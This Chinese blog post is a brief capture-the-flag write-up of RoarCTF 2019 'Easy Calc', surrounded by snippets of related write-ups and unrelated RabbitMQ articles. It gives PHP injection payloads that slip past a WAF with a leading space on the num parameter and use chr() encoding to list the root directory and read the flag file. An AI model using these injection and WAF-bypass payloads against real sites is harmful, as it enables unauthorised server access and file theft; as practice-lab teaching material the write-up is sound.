[RoarCTF 2019]Easy Calc1

最新推荐文章于 2024-09-06 15:08:44 发布
最新推荐文章于 2024-09-06 15:08:44 发布
阅读量340 收藏
点赞数 3
文章标签: rabbitmq
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kw741951/article/details/140833530
版权

打开题目

查看源码,看到

看到源代码有 calc.php,构造url打开

看到php审计代码,

由于页面中无法上传num,则输入 num,在num前加入一个空格可以让num变得可以上传,而且在进行代码解析时,php会把前面的空格去除。 

由于不能使用很多的字符,可以使用file_get_contents()函数,将ascii码转化为字符来绕过。

构造? num=var_dump(scandir(chr(47)))

scandair可以列出指定路径中的文件目录。

得到flag

? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
worker..
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[RoarCTF 2019]Easy Calc 1
weixin_45674567的博客
06-02 2734
查看源码 于是访问calc.php试试 给num参数传字母不行 WAF的问题:WAF不允许num传入字母,那我们可以在num前加个空格来绕过WAF 这里利用PHP的字符串解析特性来绕过WAF,如 calc.php? num=phpinfo(); 知识点 扫根目录下的所有文件,也就是scandir("/") ? num=print_r(scandir('/')); 这里由于单引号被过滤了,那就用chr()绕过,chr(47)就是斜杠/ ? num=print_r(scandir(chr(47))).
[RoarCTF 2019]Easy Calc(http走私 && 利用PHP的字符串解析特性Bypass)
a3320315的博客
11-06 3985
0x01 题目描述 打开题目如上图所示,有点像国赛的love_math F12查看源码 提示有waf和一个calc.php网页,我们先打开这个网页看看是什么 打开后直接给出了源码,我们可以看见过滤了一些特殊字符,然后eval执行我们的命令,想着前面的waf,不可能是这样简单的,我们先试试传入一些字符试试。 当我传入字符时,waf拦截了我们的请求 题目的突破点: 只能传入数字和运算符号,不能...
[RoarCTF 2019]Easy Calc
I_WORM的博客
02-29 694
构造payload:print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))构造payload:print_r(scandir(chr(47))) 读取根目录下的文件信息;file_get_contents() 将文件内容读取到字符串中;发现成功执行了phpinfo()函数;通过抓包测试发现了calc.php的一段源码信息;查看源码发现设置了waf;所以用chr()进行输入绕过;
第十三题——[RoarCTF 2019]Easy Calc
分享简单的安全技术
04-05 283
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,发现有一个输入栏叫我们输入计算表达式,按f12查看提示,看到一个calc.php页面且参数为num,且calc设置了WAF保护措施。 第二步:访问calc.php页面发现WAF安全规则以及参数检测 可以看到calc.php页面对num参数进行了规定,不允许参入空格以及其他的特殊字符 让num传入数字,在页面上返回数字 让num传入非数字,发现WAF限制 第三步:绕过WAF WAF检测的是"
BUUCTF [RoarCTF 2019]Easy Calc1
qq_35874748的博客
10-19 2969
一.打开题目后: 二.Ctrl+U查看源代码: 发现存在WAF和一个文件calc.php,这里我们就需要简单的了解下什么是WAF了: WAF的全称是(Web Application Firewall)即Web应用防火墙,简称WAF。 那么WAF能做什么? WAF可以过滤HTTP/HTTPS协议流量,防护Web攻击。 WAF可以对Web应用进行安全审计 WAF可以防止CC攻击 应用交付 CC攻击:通过大量请求对应用程序资源消耗最大的应用,如...
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...
[RoarCTF 2019]Easy Calc1 wp
m0_73612768的博客
12-15 1424
这里用到的方法有:空格绕过,url 溢出,http 请求走私。三种方法均可用来绕过 waf
RabbitMQ 基础架构流程 数据隔离 创建用户
生产队的驴
09-02 645
publisher:消息发送者-exchange:交换机,复制路由的消息-queue:队列,存储消息consumer:消息的消费者工作流程publisher消息发送者 -> exchange 交换机 -> queue 队列 -> consumer 消息的消费者。
RabbitMQ 应用
不能再留遗憾了的博客
09-02 987
rabbitmq应用
RabbitMQ简介
Wen_J_Q的博客
09-05 782
RabbitMQ简介。
Centos7安装RabbitMQ
最新发布
leafseelight的专栏
09-06 862
也可以去Erlang官网下载Erlang存储库https://packagecloud.io/rabbitmq/erlang?page=1,将下载好的rpm包防至Centos上。也可以直接去GitHub上下载https://www.rabbitmq.com/download.html,将下载好的rpm包放至Centos上。PS 微信搜索【蜜蜂网盘搜so】小程序,万部短剧、各种资源任意搜索。el/9就是centos9的rpm包,我们搜索el/7的。恭喜你,RabbitMQ现已经安装在系统上!
RabbitMQ】核心概念
qq_45875349的博客
09-03 778
RabbitMQ核心概念
RabbitMQ 入门教程
qq_40698086的博客
09-02 1623
RabbitMQ 是一个开源的消息代理和队列服务器,实现了 AMQP 0-9-1 标准。它能够接收、存储并转发消息数据。
SpringBoot 依赖之 Spring for RabbitMQ
ahauedu的专栏
09-03 1697
至此我们已经实现了在 IntelliJ IDEA 中创建 Spring Boot 项目,并集成并调试 Spring for RabbitMQ依赖包。依靠Spring成熟的生态,我们可以根据自己业务的实际需求进一步扩展功能,比如添加更多复杂的消息处理逻辑、错误处理和重试机制等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值